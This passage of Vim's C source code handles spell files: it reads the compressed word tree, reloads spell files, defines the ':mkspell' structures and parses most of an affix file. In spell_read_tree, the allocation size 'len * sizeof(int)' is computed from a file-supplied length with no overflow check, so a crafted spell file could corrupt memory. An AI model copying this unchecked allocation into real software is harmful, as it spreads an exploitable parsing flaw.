salitem_T tsal;
/* Move entry with same index byte after the entries
* we already found. */
++i;
--n;
tsal = smp[i + n];
mch_memmove(smp + i + 1, smp + i,
sizeof(salitem_T) * n);
smp[i] = tsal;
}
}
#endif
}
}
}
#ifdef FEAT_MBYTE
/*
* Turn a multi-byte string into a wide character string.
* Return it in allocated memory (NULL for out-of-memory)
*/
static int *
mb_str2wide(char_u *s)
{
int *res;
char_u *p;
int i = 0;
res = (int *)alloc(sizeof(int) * (mb_charlen(s) + 1));
if (res != NULL)
{
for (p = s; *p != NUL; )
res[i++] = mb_ptr2char_adv(&p);
res[i] = NUL;
}
return res;
}
#endif
/*
* Read a tree from the .spl or .sug file.
* Allocates the memory and stores pointers in "bytsp" and "idxsp".
* This is skipped when the tree has zero length.
* Returns zero when OK, SP_ value for an error.
*/
static int
spell_read_tree(
FILE *fd,
char_u **bytsp,
idx_T **idxsp,
int prefixtree, /* TRUE for the prefix tree */
int prefixcnt) /* when "prefixtree" is TRUE: prefix count */
{
int len;
int idx;
char_u *bp;
idx_T *ip;
/* The tree size was computed when writing the file, so that we can
* allocate it as one long block. <nodecount> */
len = get4c(fd);
if (len < 0)
return SP_TRUNCERROR;
if (len > 0)
{
/* Allocate the byte array. */
bp = lalloc((long_u)len, TRUE);
if (bp == NULL)
return SP_OTHERERROR;
*bytsp = bp;
/* Allocate the index array. */
ip = (idx_T *)lalloc_clear((long_u)(len * sizeof(int)), TRUE);
if (ip == NULL)
return SP_OTHERERROR;
*idxsp = ip;
/* Recursively read the tree and store it in the array. */
idx = read_tree_node(fd, bp, ip, len, 0, prefixtree, prefixcnt);
if (idx < 0)
return idx;
}
return 0;
}
/*
* Read one row of siblings from the spell file and store it in the byte array
* "byts" and index array "idxs". Recursively read the children.
*
* NOTE: The code here must match put_node()!
*
* Returns the index (>= 0) following the siblings.
* Returns SP_TRUNCERROR if the file is shorter than expected.
* Returns SP_FORMERROR if there is a format error.
*/
static idx_T
read_tree_node(
FILE *fd,
char_u *byts,
idx_T *idxs,
int maxidx, /* size of arrays */
idx_T startidx, /* current index in "byts" and "idxs" */
int prefixtree, /* TRUE for reading PREFIXTREE */
int maxprefcondnr) /* maximum for <prefcondnr> */
{
int len;
int i;
int n;
idx_T idx = startidx;
int c;
int c2;
#define SHARED_MASK 0x8000000
len = getc(fd); /* <siblingcount> */
if (len <= 0)
return SP_TRUNCERROR;
if (startidx + len >= maxidx)
return SP_FORMERROR;
byts[idx++] = len;
/* Read the byte values, flag/region bytes and shared indexes. */
for (i = 1; i <= len; ++i)
{
c = getc(fd); /* <byte> */
if (c < 0)
return SP_TRUNCERROR;
if (c <= BY_SPECIAL)
{
if (c == BY_NOFLAGS && !prefixtree)
{
/* No flags, all regions. */
idxs[idx] = 0;
c = 0;
}
else if (c != BY_INDEX)
{
if (prefixtree)
{
/* Read the optional pflags byte, the prefix ID and the
* condition nr. In idxs[] store the prefix ID in the low
* byte, the condition index shifted up 8 bits, the flags
* shifted up 24 bits. */
if (c == BY_FLAGS)
c = getc(fd) << 24; /* <pflags> */
else
c = 0;
c |= getc(fd); /* <affixID> */
n = get2c(fd); /* <prefcondnr> */
if (n >= maxprefcondnr)
return SP_FORMERROR;
c |= (n << 8);
}
else /* c must be BY_FLAGS or BY_FLAGS2 */
{
/* Read flags and optional region and prefix ID. In
* idxs[] the flags go in the low two bytes, region above
* that and prefix ID above the region. */
c2 = c;
c = getc(fd); /* <flags> */
if (c2 == BY_FLAGS2)
c = (getc(fd) << 8) + c; /* <flags2> */
if (c & WF_REGION)
c = (getc(fd) << 16) + c; /* <region> */
if (c & WF_AFX)
c = (getc(fd) << 24) + c; /* <affixID> */
}
idxs[idx] = c;
c = 0;
}
else /* c == BY_INDEX */
{
/* <nodeidx> */
n = get3c(fd);
if (n < 0 || n >= maxidx)
return SP_FORMERROR;
idxs[idx] = n + SHARED_MASK;
c = getc(fd); /* <xbyte> */
}
}
byts[idx++] = c;
}
/* Recursively read the children for non-shared siblings.
* Skip the end-of-word ones (zero byte value) and the shared ones (and
* remove SHARED_MASK) */
for (i = 1; i <= len; ++i)
if (byts[startidx + i] != 0)
{
if (idxs[startidx + i] & SHARED_MASK)
idxs[startidx + i] &= ~SHARED_MASK;
else
{
idxs[startidx + i] = idx;
idx = read_tree_node(fd, byts, idxs, maxidx, idx,
prefixtree, maxprefcondnr);
if (idx < 0)
break;
}
}
return idx;
}
/*
* Reload the spell file "fname" if it's loaded.
*/
static void
spell_reload_one(
char_u *fname,
int added_word) /* invoked through "zg" */
{
slang_T *slang;
int didit = FALSE;
for (slang = first_lang; slang != NULL; slang = slang->sl_next)
{
if (fullpathcmp(fname, slang->sl_fname, FALSE) == FPC_SAME)
{
slang_clear(slang);
if (spell_load_file(fname, NULL, slang, FALSE) == NULL)
/* reloading failed, clear the language */
slang_clear(slang);
redraw_all_later(SOME_VALID);
didit = TRUE;
}
}
/* When "zg" was used and the file wasn't loaded yet, should redo
* 'spelllang' to load it now. */
if (added_word && !didit)
did_set_spelllang(curwin);
}
/*
* Functions for ":mkspell".
*/
#define MAXLINELEN 500 /* Maximum length in bytes of a line in a .aff
and .dic file. */
/*
* Main structure to store the contents of a ".aff" file.
*/
typedef struct afffile_S
{
char_u *af_enc; /* "SET", normalized, alloc'ed string or NULL */
int af_flagtype; /* AFT_CHAR, AFT_LONG, AFT_NUM or AFT_CAPLONG */
unsigned af_rare; /* RARE ID for rare word */
unsigned af_keepcase; /* KEEPCASE ID for keep-case word */
unsigned af_bad; /* BAD ID for banned word */
unsigned af_needaffix; /* NEEDAFFIX ID */
unsigned af_circumfix; /* CIRCUMFIX ID */
unsigned af_needcomp; /* NEEDCOMPOUND ID */
unsigned af_comproot; /* COMPOUNDROOT ID */
unsigned af_compforbid; /* COMPOUNDFORBIDFLAG ID */
unsigned af_comppermit; /* COMPOUNDPERMITFLAG ID */
unsigned af_nosuggest; /* NOSUGGEST ID */
int af_pfxpostpone; /* postpone prefixes without chop string and
without flags */
int af_ignoreextra; /* IGNOREEXTRA present */
hashtab_T af_pref; /* hashtable for prefixes, affheader_T */
hashtab_T af_suff; /* hashtable for suffixes, affheader_T */
hashtab_T af_comp; /* hashtable for compound flags, compitem_T */
} afffile_T;
#define AFT_CHAR 0 /* flags are one character */
#define AFT_LONG 1 /* flags are two characters */
#define AFT_CAPLONG 2 /* flags are one or two characters */
#define AFT_NUM 3 /* flags are numbers, comma separated */
typedef struct affentry_S affentry_T;
/* Affix entry from ".aff" file. Used for prefixes and suffixes. */
struct affentry_S
{
affentry_T *ae_next; /* next affix with same name/number */
char_u *ae_chop; /* text to chop off basic word (can be NULL) */
char_u *ae_add; /* text to add to basic word (can be NULL) */
char_u *ae_flags; /* flags on the affix (can be NULL) */
char_u *ae_cond; /* condition (NULL for ".") */
regprog_T *ae_prog; /* regexp program for ae_cond or NULL */
char ae_compforbid; /* COMPOUNDFORBIDFLAG found */
char ae_comppermit; /* COMPOUNDPERMITFLAG found */
};
#ifdef FEAT_MBYTE
# define AH_KEY_LEN 17 /* 2 x 8 bytes + NUL */
#else
# define AH_KEY_LEN 7 /* 6 digits + NUL */
#endif
/* Affix header from ".aff" file. Used for af_pref and af_suff. */
typedef struct affheader_S
{
char_u ah_key[AH_KEY_LEN]; /* key for hashtab == name of affix */
unsigned ah_flag; /* affix name as number, uses "af_flagtype" */
int ah_newID; /* prefix ID after renumbering; 0 if not used */
int ah_combine; /* suffix may combine with prefix */
int ah_follows; /* another affix block should be following */
affentry_T *ah_first; /* first affix entry */
} affheader_T;
#define HI2AH(hi) ((affheader_T *)(hi)->hi_key)
/* Flag used in compound items. */
typedef struct compitem_S
{
char_u ci_key[AH_KEY_LEN]; /* key for hashtab == name of compound */
unsigned ci_flag; /* affix name as number, uses "af_flagtype" */
int ci_newID; /* affix ID after renumbering. */
} compitem_T;
#define HI2CI(hi) ((compitem_T *)(hi)->hi_key)
/*
* Structure that is used to store the items in the word tree. This avoids
* the need to keep track of each allocated thing, everything is freed all at
* once after ":mkspell" is done.
* Note: "sb_next" must be just before "sb_data" to make sure the alignment of
* "sb_data" is correct for systems where pointers must be aligned on
* pointer-size boundaries and sizeof(pointer) > sizeof(int) (e.g., Sparc).
*/
#define SBLOCKSIZE 16000 /* size of sb_data */
typedef struct sblock_S sblock_T;
struct sblock_S
{
int sb_used; /* nr of bytes already in use */
sblock_T *sb_next; /* next block in list */
char_u sb_data[1]; /* data, actually longer */
};
/*
* A node in the tree.
*/
typedef struct wordnode_S wordnode_T;
struct wordnode_S
{
union /* shared to save space */
{
char_u hashkey[6]; /* the hash key, only used while compressing */
int index; /* index in written nodes (valid after first
round) */
} wn_u1;
union /* shared to save space */
{
wordnode_T *next; /* next node with same hash key */
wordnode_T *wnode; /* parent node that will write this node */
} wn_u2;
wordnode_T *wn_child; /* child (next byte in word) */
wordnode_T *wn_sibling; /* next sibling (alternate byte in word,
always sorted) */
int wn_refs; /* Nr. of references to this node. Only
relevant for first node in a list of
siblings, in following siblings it is
always one. */
char_u wn_byte; /* Byte for this node. NUL for word end */
/* Info for when "wn_byte" is NUL.
* In PREFIXTREE "wn_region" is used for the prefcondnr.
* In the soundfolded word tree "wn_flags" has the MSW of the wordnr and
* "wn_region" the LSW of the wordnr. */
char_u wn_affixID; /* supported/required prefix ID or 0 */
short_u wn_flags; /* WF_ flags */
short wn_region; /* region mask */
#ifdef SPELL_PRINTTREE
int wn_nr; /* sequence nr for printing */
#endif
};
#define WN_MASK 0xffff /* mask relevant bits of "wn_flags" */
#define HI2WN(hi) (wordnode_T *)((hi)->hi_key)
/*
* Info used while reading the spell files.
*/
typedef struct spellinfo_S
{
wordnode_T *si_foldroot; /* tree with case-folded words */
long si_foldwcount; /* nr of words in si_foldroot */
wordnode_T *si_keeproot; /* tree with keep-case words */
long si_keepwcount; /* nr of words in si_keeproot */
wordnode_T *si_prefroot; /* tree with postponed prefixes */
long si_sugtree; /* creating the soundfolding trie */
sblock_T *si_blocks; /* memory blocks used */
long si_blocks_cnt; /* memory blocks allocated */
int si_did_emsg; /* TRUE when ran out of memory */
long si_compress_cnt; /* words to add before lowering
compression limit */
wordnode_T *si_first_free; /* List of nodes that have been freed during
compression, linked by "wn_child" field. */
long si_free_count; /* number of nodes in si_first_free */
#ifdef SPELL_PRINTTREE
int si_wordnode_nr; /* sequence nr for nodes */
#endif
buf_T *si_spellbuf; /* buffer used to store soundfold word table */
int si_ascii; /* handling only ASCII words */
int si_add; /* addition file */
int si_clear_chartab; /* when TRUE clear char tables */
int si_region; /* region mask */
vimconv_T si_conv; /* for conversion to 'encoding' */
int si_memtot; /* runtime memory used */
int si_verbose; /* verbose messages */
int si_msg_count; /* number of words added since last message */
char_u *si_info; /* info text chars or NULL */
int si_region_count; /* number of regions supported (1 when there
are no regions) */
char_u si_region_name[17]; /* region names; used only if
* si_region_count > 1) */
garray_T si_rep; /* list of fromto_T entries from REP lines */
garray_T si_repsal; /* list of fromto_T entries from REPSAL lines */
garray_T si_sal; /* list of fromto_T entries from SAL lines */
char_u *si_sofofr; /* SOFOFROM text */
char_u *si_sofoto; /* SOFOTO text */
int si_nosugfile; /* NOSUGFILE item found */
int si_nosplitsugs; /* NOSPLITSUGS item found */
int si_nocompoundsugs; /* NOCOMPOUNDSUGS item found */
int si_followup; /* soundsalike: ? */
int si_collapse; /* soundsalike: ? */
hashtab_T si_commonwords; /* hashtable for common words */
time_t si_sugtime; /* timestamp for .sug file */
int si_rem_accents; /* soundsalike: remove accents */
garray_T si_map; /* MAP info concatenated */
char_u *si_midword; /* MIDWORD chars or NULL */
int si_compmax; /* max nr of words for compounding */
int si_compminlen; /* minimal length for compounding */
int si_compsylmax; /* max nr of syllables for compounding */
int si_compoptions; /* COMP_ flags */
garray_T si_comppat; /* CHECKCOMPOUNDPATTERN items, each stored as
a string */
char_u *si_compflags; /* flags used for compounding */
char_u si_nobreak; /* NOBREAK */
char_u *si_syllable; /* syllable string */
garray_T si_prefcond; /* table with conditions for postponed
* prefixes, each stored as a string */
int si_newprefID; /* current value for ah_newID */
int si_newcompID; /* current value for compound ID */
} spellinfo_T;
static afffile_T *spell_read_aff(spellinfo_T *spin, char_u *fname);
static int is_aff_rule(char_u **items, int itemcnt, char *rulename, int mincount);
static void aff_process_flags(afffile_T *affile, affentry_T *entry);
static int spell_info_item(char_u *s);
static unsigned affitem2flag(int flagtype, char_u *item, char_u *fname, int lnum);
static unsigned get_affitem(int flagtype, char_u **pp);
static void process_compflags(spellinfo_T *spin, afffile_T *aff, char_u *compflags);
static void check_renumber(spellinfo_T *spin);
static int flag_in_afflist(int flagtype, char_u *afflist, unsigned flag);
static void aff_check_number(int spinval, int affval, char *name);
static void aff_check_string(char_u *spinval, char_u *affval, char *name);
static int str_equal(char_u *s1, char_u *s2);
static void add_fromto(spellinfo_T *spin, garray_T *gap, char_u *from, char_u *to);
static int sal_to_bool(char_u *s);
static void spell_free_aff(afffile_T *aff);
static int spell_read_dic(spellinfo_T *spin, char_u *fname, afffile_T *affile);
static int get_affix_flags(afffile_T *affile, char_u *afflist);
static int get_pfxlist(afffile_T *affile, char_u *afflist, char_u *store_afflist);
static void get_compflags(afffile_T *affile, char_u *afflist, char_u *store_afflist);
static int store_aff_word(spellinfo_T *spin, char_u *word, char_u *afflist, afffile_T *affile, hashtab_T *ht, hashtab_T *xht, int condit, int flags, char_u *pfxlist, int pfxlen);
static int spell_read_wordfile(spellinfo_T *spin, char_u *fname);
static void *getroom(spellinfo_T *spin, size_t len, int align);
static char_u *getroom_save(spellinfo_T *spin, char_u *s);
static void free_blocks(sblock_T *bl);
static wordnode_T *wordtree_alloc(spellinfo_T *spin);
static int store_word(spellinfo_T *spin, char_u *word, int flags, int region, char_u *pfxlist, int need_affix);
static int tree_add_word(spellinfo_T *spin, char_u *word, wordnode_T *tree, int flags, int region, int affixID);
static wordnode_T *get_wordnode(spellinfo_T *spin);
static int deref_wordnode(spellinfo_T *spin, wordnode_T *node);
static void free_wordnode(spellinfo_T *spin, wordnode_T *n);
static void wordtree_compress(spellinfo_T *spin, wordnode_T *root);
static int node_compress(spellinfo_T *spin, wordnode_T *node, hashtab_T *ht, int *tot);
static int node_equal(wordnode_T *n1, wordnode_T *n2);
static int write_vim_spell(spellinfo_T *spin, char_u *fname);
static void clear_node(wordnode_T *node);
static int put_node(FILE *fd, wordnode_T *node, int idx, int regionmask, int prefixtree);
static void spell_make_sugfile(spellinfo_T *spin, char_u *wfname);
static int sug_filltree(spellinfo_T *spin, slang_T *slang);
static int sug_maketable(spellinfo_T *spin);
static int sug_filltable(spellinfo_T *spin, wordnode_T *node, int startwordnr, garray_T *gap);
static int offset2bytes(int nr, char_u *buf);
static void sug_write(spellinfo_T *spin, char_u *fname);
static void spell_message(spellinfo_T *spin, char_u *str);
static void init_spellfile(void);
/* In the postponed prefixes tree wn_flags is used to store the WFP_ flags,
* but it must be negative to indicate the prefix tree to tree_add_word().
* Use a negative number with the lower 8 bits zero. */
#define PFX_FLAGS -256
/* flags for "condit" argument of store_aff_word() */
#define CONDIT_COMB 1 /* affix must combine */
#define CONDIT_CFIX 2 /* affix must have CIRCUMFIX flag */
#define CONDIT_SUF 4 /* add a suffix for matching flags */
#define CONDIT_AFF 8 /* word already has an affix */
/*
* Tunable parameters for when the tree is compressed. See 'mkspellmem'.
*/
static long compress_start = 30000; /* memory / SBLOCKSIZE */
static long compress_inc = 100; /* memory / SBLOCKSIZE */
static long compress_added = 500000; /* word count */
/*
* Check the 'mkspellmem' option. Return FAIL if it's wrong.
* Sets "sps_flags".
*/
int
spell_check_msm(void)
{
char_u *p = p_msm;
long start = 0;
long incr = 0;
long added = 0;
if (!VIM_ISDIGIT(*p))
return FAIL;
/* block count = (value * 1024) / SBLOCKSIZE (but avoid overflow)*/
start = (getdigits(&p) * 10) / (SBLOCKSIZE / 102);
if (*p != ',')
return FAIL;
++p;
if (!VIM_ISDIGIT(*p))
return FAIL;
incr = (getdigits(&p) * 102) / (SBLOCKSIZE / 10);
if (*p != ',')
return FAIL;
++p;
if (!VIM_ISDIGIT(*p))
return FAIL;
added = getdigits(&p) * 1024;
if (*p != NUL)
return FAIL;
if (start == 0 || incr == 0 || added == 0 || incr > start)
return FAIL;
compress_start = start;
compress_inc = incr;
compress_added = added;
return OK;
}
#ifdef SPELL_PRINTTREE
/*
* For debugging the tree code: print the current tree in a (more or less)
* readable format, so that we can see what happens when adding a word and/or
* compressing the tree.
* Based on code from Olaf Seibert.
*/
#define PRINTLINESIZE 1000
#define PRINTWIDTH 6
#define PRINTSOME(l, depth, fmt, a1, a2) vim_snprintf(l + depth * PRINTWIDTH, \
PRINTLINESIZE - PRINTWIDTH * depth, fmt, a1, a2)
static char line1[PRINTLINESIZE];
static char line2[PRINTLINESIZE];
static char line3[PRINTLINESIZE];
static void
spell_clear_flags(wordnode_T *node)
{
wordnode_T *np;
for (np = node; np != NULL; np = np->wn_sibling)
{
np->wn_u1.index = FALSE;
spell_clear_flags(np->wn_child);
}
}
static void
spell_print_node(wordnode_T *node, int depth)
{
if (node->wn_u1.index)
{
/* Done this node before, print the reference. */
PRINTSOME(line1, depth, "(%d)", node->wn_nr, 0);
PRINTSOME(line2, depth, " ", 0, 0);
PRINTSOME(line3, depth, " ", 0, 0);
msg((char_u *)line1);
msg((char_u *)line2);
msg((char_u *)line3);
}
else
{
node->wn_u1.index = TRUE;
if (node->wn_byte != NUL)
{
if (node->wn_child != NULL)
PRINTSOME(line1, depth, " %c -> ", node->wn_byte, 0);
else
/* Cannot happen? */
PRINTSOME(line1, depth, " %c ???", node->wn_byte, 0);
}
else
PRINTSOME(line1, depth, " $ ", 0, 0);
PRINTSOME(line2, depth, "%d/%d ", node->wn_nr, node->wn_refs);
if (node->wn_sibling != NULL)
PRINTSOME(line3, depth, " | ", 0, 0);
else
PRINTSOME(line3, depth, " ", 0, 0);
if (node->wn_byte == NUL)
{
msg((char_u *)line1);
msg((char_u *)line2);
msg((char_u *)line3);
}
/* do the children */
if (node->wn_byte != NUL && node->wn_child != NULL)
spell_print_node(node->wn_child, depth + 1);
/* do the siblings */
if (node->wn_sibling != NULL)
{
/* get rid of all parent details except | */
STRCPY(line1, line3);
STRCPY(line2, line3);
spell_print_node(node->wn_sibling, depth);
}
}
}
static void
spell_print_tree(wordnode_T *root)
{
if (root != NULL)
{
/* Clear the "wn_u1.index" fields, used to remember what has been
* done. */
spell_clear_flags(root);
/* Recursively print the tree. */
spell_print_node(root, 0);
}
}
#endif /* SPELL_PRINTTREE */
/*
* Read the affix file "fname".
* Returns an afffile_T, NULL for complete failure.
*/
static afffile_T *
spell_read_aff(spellinfo_T *spin, char_u *fname)
{
FILE *fd;
afffile_T *aff;
char_u rline[MAXLINELEN];
char_u *line;
char_u *pc = NULL;
#define MAXITEMCNT 30
char_u *(items[MAXITEMCNT]);
int itemcnt;
char_u *p;
int lnum = 0;
affheader_T *cur_aff = NULL;
int did_postpone_prefix = FALSE;
int aff_todo = 0;
hashtab_T *tp;
char_u *low = NULL;
char_u *fol = NULL;
char_u *upp = NULL;
int do_rep;
int do_repsal;
int do_sal;
int do_mapline;
int found_map = FALSE;
hashitem_T *hi;
int l;
int compminlen = 0; /* COMPOUNDMIN value */
int compsylmax = 0; /* COMPOUNDSYLMAX value */
int compoptions = 0; /* COMP_ flags */
int compmax = 0; /* COMPOUNDWORDMAX value */
char_u *compflags = NULL; /* COMPOUNDFLAG and COMPOUNDRULE
concatenated */
char_u *midword = NULL; /* MIDWORD value */
char_u *syllable = NULL; /* SYLLABLE value */
char_u *sofofrom = NULL; /* SOFOFROM value */
char_u *sofoto = NULL; /* SOFOTO value */
/*
* Open the file.
*/
fd = mch_fopen((char *)fname, "r");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return NULL;
}
vim_snprintf((char *)IObuff, IOSIZE, _("Reading affix file %s ..."), fname);
spell_message(spin, IObuff);
/* Only do REP lines when not done in another .aff file already. */
do_rep = spin->si_rep.ga_len == 0;
/* Only do REPSAL lines when not done in another .aff file already. */
do_repsal = spin->si_repsal.ga_len == 0;
/* Only do SAL lines when not done in another .aff file already. */
do_sal = spin->si_sal.ga_len == 0;
/* Only do MAP lines when not done in another .aff file already. */
do_mapline = spin->si_map.ga_len == 0;
/*
* Allocate and init the afffile_T structure.
*/
aff = (afffile_T *)getroom(spin, sizeof(afffile_T), TRUE);
if (aff == NULL)
{
fclose(fd);
return NULL;
}
hash_init(&aff->af_pref);
hash_init(&aff->af_suff);
hash_init(&aff->af_comp);
/*
* Read all the lines in the file one by one.
*/
while (!vim_fgets(rline, MAXLINELEN, fd) && !got_int)
{
line_breakcheck();
++lnum;
/* Skip comment lines. */
if (*rline == '#')
continue;
/* Convert from "SET" to 'encoding' when needed. */
vim_free(pc);
#ifdef FEAT_MBYTE
if (spin->si_conv.vc_type != CONV_NONE)
{
pc = string_convert(&spin->si_conv, rline, NULL);
if (pc == NULL)
{
smsg((char_u *)_("Conversion failure for word in %s line %d: %s"),
fname, lnum, rline);
continue;
}
line = pc;
}
else
#endif
{
pc = NULL;
line = rline;
}
/* Split the line up in white separated items. Put a NUL after each
* item. */
itemcnt = 0;
for (p = line; ; )
{
while (*p != NUL && *p <= ' ') /* skip white space and CR/NL */
++p;
if (*p == NUL)
break;
if (itemcnt == MAXITEMCNT) /* too many items */
break;
items[itemcnt++] = p;
/* A few items have arbitrary text argument, don't split them. */
if (itemcnt == 2 && spell_info_item(items[0]))
while (*p >= ' ' || *p == TAB) /* skip until CR/NL */
++p;
else
while (*p > ' ') /* skip until white space or CR/NL */
++p;
if (*p == NUL)
break;
*p++ = NUL;
}
/* Handle non-empty lines. */
if (itemcnt > 0)
{
if (is_aff_rule(items, itemcnt, "SET", 2) && aff->af_enc == NULL)
{
#ifdef FEAT_MBYTE
/* Setup for conversion from "ENC" to 'encoding'. */
aff->af_enc = enc_canonize(items[1]);
if (aff->af_enc != NULL && !spin->si_ascii
&& convert_setup(&spin->si_conv, aff->af_enc,
p_enc) == FAIL)
smsg((char_u *)_("Conversion in %s not supported: from %s to %s"),
fname, aff->af_enc, p_enc);
spin->si_conv.vc_fail = TRUE;
#else
smsg((char_u *)_("Conversion in %s not supported"), fname);
#endif
}
else if (is_aff_rule(items, itemcnt, "FLAG", 2)
&& aff->af_flagtype == AFT_CHAR)
{
if (STRCMP(items[1], "long") == 0)
aff->af_flagtype = AFT_LONG;
else if (STRCMP(items[1], "num") == 0)
aff->af_flagtype = AFT_NUM;
else if (STRCMP(items[1], "caplong") == 0)
aff->af_flagtype = AFT_CAPLONG;
else
smsg((char_u *)_("Invalid value for FLAG in %s line %d: %s"),
fname, lnum, items[1]);
if (aff->af_rare != 0
|| aff->af_keepcase != 0
|| aff->af_bad != 0
|| aff->af_needaffix != 0
|| aff->af_circumfix != 0
|| aff->af_needcomp != 0
|| aff->af_comproot != 0
|| aff->af_nosuggest != 0
|| compflags != NULL
|| aff->af_suff.ht_used > 0
|| aff->af_pref.ht_used > 0)
smsg((char_u *)_("FLAG after using flags in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (spell_info_item(items[0]))
{
p = (char_u *)getroom(spin,
(spin->si_info == NULL ? 0 : STRLEN(spin->si_info))
+ STRLEN(items[0])
+ STRLEN(items[1]) + 3, FALSE);
if (p != NULL)
{
if (spin->si_info != NULL)
{
STRCPY(p, spin->si_info);
STRCAT(p, "\n");
}
STRCAT(p, items[0]);
STRCAT(p, " ");
STRCAT(p, items[1]);
spin->si_info = p;
}
}
else if (is_aff_rule(items, itemcnt, "MIDWORD", 2)
&& midword == NULL)
{
midword = getroom_save(spin, items[1]);
}
else if (is_aff_rule(items, itemcnt, "TRY", 2))
{
/* ignored, we look in the tree for what chars may appear */
}
/* TODO: remove "RAR" later */
else if ((is_aff_rule(items, itemcnt, "RAR", 2)
|| is_aff_rule(items, itemcnt, "RARE", 2))
&& aff->af_rare == 0)
{
aff->af_rare = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
/* TODO: remove "KEP" later */
else if ((is_aff_rule(items, itemcnt, "KEP", 2)
|| is_aff_rule(items, itemcnt, "KEEPCASE", 2))
&& aff->af_keepcase == 0)
{
aff->af_keepcase = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if ((is_aff_rule(items, itemcnt, "BAD", 2)
|| is_aff_rule(items, itemcnt, "FORBIDDENWORD", 2))
&& aff->af_bad == 0)
{
aff->af_bad = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "NEEDAFFIX", 2)
&& aff->af_needaffix == 0)
{
aff->af_needaffix = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "CIRCUMFIX", 2)
&& aff->af_circumfix == 0)
{
aff->af_circumfix = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "NOSUGGEST", 2)
&& aff->af_nosuggest == 0)
{
aff->af_nosuggest = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if ((is_aff_rule(items, itemcnt, "NEEDCOMPOUND", 2)
|| is_aff_rule(items, itemcnt, "ONLYINCOMPOUND", 2))
&& aff->af_needcomp == 0)
{
aff->af_needcomp = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDROOT", 2)
&& aff->af_comproot == 0)
{
aff->af_comproot = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDFORBIDFLAG", 2)
&& aff->af_compforbid == 0)
{
aff->af_compforbid = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
if (aff->af_pref.ht_used > 0)
smsg((char_u *)_("Defining COMPOUNDFORBIDFLAG after PFX item may give wrong results in %s line %d"),
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDPERMITFLAG", 2)
&& aff->af_comppermit == 0)
{
aff->af_comppermit = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
if (aff->af_pref.ht_used > 0)
smsg((char_u *)_("Defining COMPOUNDPERMITFLAG after PFX item may give wrong results in %s line %d"),
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDFLAG", 2)
&& compflags == NULL)
{
/* Turn flag "c" into COMPOUNDRULE compatible string "c+",
* "Na" into "Na+", "1234" into "1234+". */
p = getroom(spin, STRLEN(items[1]) + 2, FALSE);
if (p != NULL)
{
STRCPY(p, items[1]);
STRCAT(p, "+");
compflags = p;
}
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDRULES", 2))
{
/* We don't use the count, but do check that it's a number and
* not COMPOUNDRULE mistyped. */
if (atoi((char *)items[1]) == 0)
smsg((char_u *)_("Wrong COMPOUNDRULES value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDRULE", 2))
{
/* Don't use the first rule if it is a number. */
if (compflags != NULL || *skipdigits(items[1]) != NUL)
{
/* Concatenate this string to previously defined ones,
* using a slash to separate them. */
l = (int)STRLEN(items[1]) + 1;
if (compflags != NULL)
l += (int)STRLEN(compflags) + 1;
p = getroom(spin, l, FALSE);
if (p != NULL)
{
if (compflags != NULL)
{
STRCPY(p, compflags);
STRCAT(p, "/");
}
STRCAT(p, items[1]);
compflags = p;
}
}
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDWORDMAX", 2)
&& compmax == 0)
{
compmax = atoi((char *)items[1]);
if (compmax == 0)
smsg((char_u *)_("Wrong COMPOUNDWORDMAX value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDMIN", 2)
&& compminlen == 0)
{
compminlen = atoi((char *)items[1]);
if (compminlen == 0)
smsg((char_u *)_("Wrong COMPOUNDMIN value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDSYLMAX", 2)
&& compsylmax == 0)
{
compsylmax = atoi((char *)items[1]);
if (compsylmax == 0)
smsg((char_u *)_("Wrong COMPOUNDSYLMAX value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDDUP", 1))
{
compoptions |= COMP_CHECKDUP;
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDREP", 1))
{
compoptions |= COMP_CHECKREP;
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDCASE", 1))
{
compoptions |= COMP_CHECKCASE;
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDTRIPLE", 1))
{
compoptions |= COMP_CHECKTRIPLE;
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDPATTERN", 2))
{
if (atoi((char *)items[1]) == 0)
smsg((char_u *)_("Wrong CHECKCOMPOUNDPATTERN value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "CHECKCOMPOUNDPATTERN", 3))
{
garray_T *gap = &spin->si_comppat;
int i;
/* Only add the couple if it isn't already there. */
for (i = 0; i < gap->ga_len - 1; i += 2)
if (STRCMP(((char_u **)(gap->ga_data))[i], items[1]) == 0
&& STRCMP(((char_u **)(gap->ga_data))[i + 1],
items[2]) == 0)
break;
if (i >= gap->ga_len && ga_grow(gap, 2) == OK)
{
((char_u **)(gap->ga_data))[gap->ga_len++]
= getroom_save(spin, items[1]);
((char_u **)(gap->ga_data))[gap->ga_len++]
= getroom_save(spin, items[2]);
}
}
else if (is_aff_rule(items, itemcnt, "SYLLABLE", 2)
&& syllable == NULL)
{
syllable = getroom_save(spin, items[1]);
}
else if (is_aff_rule(items, itemcnt, "NOBREAK", 1))
{
